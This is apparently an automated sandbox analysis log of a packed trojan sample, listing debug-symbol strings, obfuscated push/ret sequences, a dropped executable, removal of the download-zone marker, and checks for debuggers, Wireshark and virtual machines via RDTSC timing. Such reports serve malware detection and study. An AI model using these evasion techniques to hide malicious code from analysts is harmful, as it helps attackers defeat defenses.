Source: Binary string: explorer.pdb source: WerFault.exe, 0000000A.00000003.725996524.000001EDC6DEA000.00000004.00000001.sdmp
Source: Binary string: twinui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: NPSMDesktopProvider.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: capauthz.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Wer.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: user32.pdb0 source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: devobj.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb&uX source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ES.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdb2R source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb-S| source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbm source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: framedynos.pdbt8 source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb?jO source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb9S@ source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: DXP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000A.00000003.729628969.000001EDC6F2D000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088189F8 pushad ; retf 0_2_088189F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088189FA push eax; retf 0_2_08818A01
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041DD78 pushfd ; ret 1_2_0041DD79
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_004175C7 push ss; ret 1_2_004175C8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00414E16 pushfd ; retf 1_2_00414E1F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0130D0D1 push ecx; ret 1_2_0130D0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047CD0D1 push ecx; ret 6_2_047CD0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015DD78 pushfd ; ret 6_2_0015DD79
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_001575C7 push ss; ret 6_2_001575C8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00154E16 pushfd ; retf 6_2_00154E1F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CEB5 push eax; ret 6_2_0015CF08
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CF02 push eax; ret 6_2_0015CF08
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CF0B push eax; ret 6_2_0015CF72
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CF6C push eax; ret 6_2_0015CF72

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe\:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE@+K
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE10747
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE11798
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000001498E4 second address: 00000000001498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000000149B5E second address: 0000000000149B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D0A50000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D0BA0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D0CA0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1110000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1850000 memory reserve | memory write watch
